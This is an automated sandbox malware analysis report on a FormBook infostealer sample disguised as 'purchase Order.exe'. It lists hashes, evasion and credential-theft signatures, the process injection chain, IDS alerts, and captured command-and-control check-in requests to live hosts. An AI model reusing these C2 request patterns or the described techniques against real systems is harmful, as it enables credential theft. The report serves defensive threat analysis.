Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
purchase Order.exe

Overview

General Information

Sample name:purchase Order.exe
Analysis ID:1561730
MD5:e46648bd205f6e9908880c73a9cb2847
SHA1:478c6f62acfbf5e91d5cfa6fb7511816be5cce57
SHA256:b67a3251ab0a9126e283677b065a75f6463e4cd0becc96f1a78dce212cce4b2e
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • purchase Order.exe (PID: 4068 cmdline: "C:\Users\user\Desktop\purchase Order.exe" MD5: E46648BD205F6E9908880C73A9CB2847)
    • svchost.exe (PID: 5760 cmdline: "C:\Users\user\Desktop\purchase Order.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • McqlvggSSSjC.exe (PID: 6216 cmdline: "C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • bitsadmin.exe (PID: 6240 cmdline: "C:\Windows\SysWOW64\bitsadmin.exe" MD5: F57A03FA0E654B393BB078D1C60695F3)
          • McqlvggSSSjC.exe (PID: 1980 cmdline: "C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2376 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.3220556041.0000000000C00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.3221831734.00000000030C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.3223837018.0000000005850000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.1621550666.00000000036A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.1621140733.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe" , CommandLine: "C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe, NewProcessName: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe, OriginalFileName: C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe, ParentCommandLine: "C:\Windows\SysWOW64\bitsadmin.exe", ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 6240, ParentProcessName: bitsadmin.exe, ProcessCommandLine: "C:\Program Files (x86)\WwHBghwRuZhjdvWqQcfJiNEEpxBkNrGETvayiiryIwJAyJcpcqTkqimQZpX\McqlvggSSSjC.exe" , ProcessId: 1980, ProcessName: McqlvggSSSjC.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\purchase Order.exe", CommandLine: "C:\Users\user\Desktop\purchase Order.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase Order.exe", ParentImage: C:\Users\user\Desktop\purchase Order.exe, ParentProcessId: 4068, ParentProcessName: purchase Order.exe, ProcessCommandLine: "C:\Users\user\Desktop\purchase Order.exe", ProcessId: 5760, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\purchase Order.exe", CommandLine: "C:\Users\user\Desktop\purchase Order.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\purchase Order.exe", ParentImage: C:\Users\user\Desktop\purchase Order.exe, ParentProcessId: 4068, ParentProcessName: purchase Order.exe, ProcessCommandLine: "C:\Users\user\Desktop\purchase Order.exe", ProcessId: 5760, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-24T08:13:05.360687+010020507451Malware Command and Control Activity Detected192.168.2.949803161.97.168.24580TCP
                2024-11-24T08:13:31.110419+010020507451Malware Command and Control Activity Detected192.168.2.94986327.124.4.24680TCP
                2024-11-24T08:14:07.393960+010020507451Malware Command and Control Activity Detected192.168.2.949902149.88.81.19080TCP
                2024-11-24T08:14:23.128933+010020507451Malware Command and Control Activity Detected192.168.2.94998685.159.66.9380TCP
                2024-11-24T08:14:38.188508+010020507451Malware Command and Control Activity Detected192.168.2.949990185.27.134.14480TCP
                2024-11-24T08:14:53.273537+010020507451Malware Command and Control Activity Detected192.168.2.949994172.67.145.23480TCP
                2024-11-24T08:15:08.316038+010020507451Malware Command and Control Activity Detected192.168.2.949998172.67.167.14680TCP
                2024-11-24T08:15:23.516537+010020507451Malware Command and Control Activity Detected192.168.2.950002154.88.22.11080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-24T08:13:05.360687+010028554651A Network Trojan was detected192.168.2.949803161.97.168.24580TCP
                2024-11-24T08:13:31.110419+010028554651A Network Trojan was detected192.168.2.94986327.124.4.24680TCP
                2024-11-24T08:14:07.393960+010028554651A Network Trojan was detected192.168.2.949902149.88.81.19080TCP
                2024-11-24T08:14:23.128933+010028554651A Network Trojan was detected192.168.2.94998685.159.66.9380TCP
                2024-11-24T08:14:38.188508+010028554651A Network Trojan was detected192.168.2.949990185.27.134.14480TCP
                2024-11-24T08:14:53.273537+010028554651A Network Trojan was detected192.168.2.949994172.67.145.23480TCP
                2024-11-24T08:15:08.316038+010028554651A Network Trojan was detected192.168.2.949998172.67.167.14680TCP
                2024-11-24T08:15:23.516537+010028554651A Network Trojan was detected192.168.2.950002154.88.22.11080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-24T08:13:23.188575+010028554641A Network Trojan was detected192.168.2.94984527.124.4.24680TCP
                2024-11-24T08:13:25.829233+010028554641A Network Trojan was detected192.168.2.94985127.124.4.24680TCP
                2024-11-24T08:13:28.485540+010028554641A Network Trojan was detected192.168.2.94985727.124.4.24680TCP
                2024-11-24T08:13:38.954469+010028554641A Network Trojan was detected192.168.2.949883149.88.81.19080TCP
                2024-11-24T08:13:41.626315+010028554641A Network Trojan was detected192.168.2.949889149.88.81.19080TCP
                2024-11-24T08:13:44.298121+010028554641A Network Trojan was detected192.168.2.949895149.88.81.19080TCP
                2024-11-24T08:14:15.220013+010028554641A Network Trojan was detected192.168.2.94996785.159.66.9380TCP
                2024-11-24T08:14:17.891846+010028554641A Network Trojan was detected192.168.2.94997385.159.66.9380TCP
                2024-11-24T08:14:20.563785+010028554641A Network Trojan was detected192.168.2.94997985.159.66.9380TCP
                2024-11-24T08:14:30.104854+010028554641A Network Trojan was detected192.168.2.949987185.27.134.14480TCP
                2024-11-24T08:14:32.766640+010028554641A Network Trojan was detected192.168.2.949988185.27.134.14480TCP
                2024-11-24T08:14:35.517068+010028554641A Network Trojan was detected192.168.2.949989185.27.134.14480TCP
                2024-11-24T08:14:45.532572+010028554641A Network Trojan was detected192.168.2.949991172.67.145.23480TCP
                2024-11-24T08:14:47.949610+010028554641A Network Trojan was detected192.168.2.949992172.67.145.23480TCP
                2024-11-24T08:14:50.602328+010028554641A Network Trojan was detected192.168.2.949993172.67.145.23480TCP
                2024-11-24T08:15:00.280976+010028554641A Network Trojan was detected192.168.2.949995172.67.167.14680TCP
                2024-11-24T08:15:02.945910+010028554641A Network Trojan was detected192.168.2.949996172.67.167.14680TCP
                2024-11-24T08:15:05.598869+010028554641A Network Trojan was detected192.168.2.949997172.67.167.14680TCP
                2024-11-24T08:15:15.532547+010028554641A Network Trojan was detected192.168.2.949999154.88.22.11080TCP
                2024-11-24T08:15:18.188878+010028554641A Network Trojan was detected192.168.2.950000154.88.22.11080TCP
                2024-11-24T08:15:20.860837+010028554641A Network Trojan was detected192.168.2.950001154.88.22.11080TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: purchase Order.exeReversingLabs: Detection: 57%
                Source: purchase Order.exeVirustotal: Detection: 63%Perma Link
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3220556041.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3221831734.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3223837018.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1621550666.00000000036A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1621140733.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3221901716.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3222030300.0000000002E50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1622264740.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: purchase Order.exeJoe Sandbox ML: detected
                Source: purchase Order.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000002.00000003.1587669784.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587772591.0000000003048000.00000004.00000020.00020000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3220941177.0000000000558000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000002.00000003.1587669784.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587772591.0000000003048000.00000004.00000020.00020000.00000000.sdmp, McqlvggSSSjC.exe, 00000004.00000002.3220941177.0000000000558000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: McqlvggSSSjC.exe, 00000004.00000002.3221614821.0000000000D6E000.00000002.00000001.01000000.00000005.sdmp, McqlvggSSSjC.exe, 00000006.00000000.1689659605.0000000000D6E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: purchase Order.exe, 00000000.00000003.1396204625.0000000004110000.00000004.00001000.00020000.00000000.sdmp, purchase Order.exe, 00000000.00000003.1392103666.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1621586541.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1621586541.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523966149.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1525871105.0000000003500000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3222107519.000000000349E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1624599311.000000000314D000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1621215239.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3222107519.0000000003300000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: purchase Order.exe, 00000000.00000003.1396204625.0000000004110000.00000004.00001000.00020000.00000000.sdmp, purchase Order.exe, 00000000.00000003.1392103666.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1621586541.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1621586541.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523966149.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1525871105.0000000003500000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3222107519.000000000349E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1624599311.000000000314D000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.1621215239.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3222107519.0000000003300000.00000040.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C86CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C86CA9
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C860DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00C860DD
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C863F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00C863F9
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C8EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C8EB60
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C8F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00C8F5FA
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C8F56F FindFirstFileW,FindClose,0_2_00C8F56F
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C91B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C91B2F
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C91C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C91C8A
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C91F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C91F94

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49863 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49845 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49863 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49803 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49803 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49851 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49857 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49883 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49889 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49902 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49902 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49967 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49895 -> 149.88.81.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49987 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49979 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49973 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49988 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49999 -> 154.88.22.110:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49997 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49992 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49994 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49994 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:50001 -> 154.88.22.110:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49995 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49990 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49990 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49993 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49998 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49998 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49989 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:50002 -> 154.88.22.110:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:50002 -> 154.88.22.110:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49996 -> 172.67.167.146:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49991 -> 172.67.145.234:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49986 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49986 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:50000 -> 154.88.22.110:80
                Source: DNS query: www.soainsaat.xyz
                Source: DNS query: www.soainsaat.xyz
                Source: DNS query: www.amayavp.xyz
                Source: Joe Sandbox ViewIP Address: 185.27.134.144 185.27.134.144
                Source: Joe Sandbox ViewASN Name: SAIC-ASUS SAIC-ASUS
                Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: WILDCARD-ASWildcardUKLimitedGB WILDCARD-ASWildcardUKLimitedGB
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\purchase Order.exeCode function: 0_2_00C94EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00C94EB5
                Source: global trafficHTTP traffic detected: GET /xxr1/?6vSXrZxp=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM6q1x7MLoHRo8pv4eG/wGdJUiKAzPmFA==&av=Zj6TS2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nb-shenshi.buzzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /sgdd/?6vSXrZxp=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZCyCtFSFHqJZS4hLcKGIJEWFKX2dKFA==&av=Zj6TS2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.laohub10.netConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /rq1s/?av=Zj6TS2&6vSXrZxp=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpFlLQlu0hJqsiOw5MBYhb6NnUPB5dt5g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.xcvbj.asiaConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                Source: global trafficHTTP traffic detected: GET /rum2/?6vSXrZxp=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygB3zcAk+0XRlHo47zsG34ZF8bKKHH4pA==&av=Zj6TS2 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.soainsaat.xyzConnection: closeUser-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
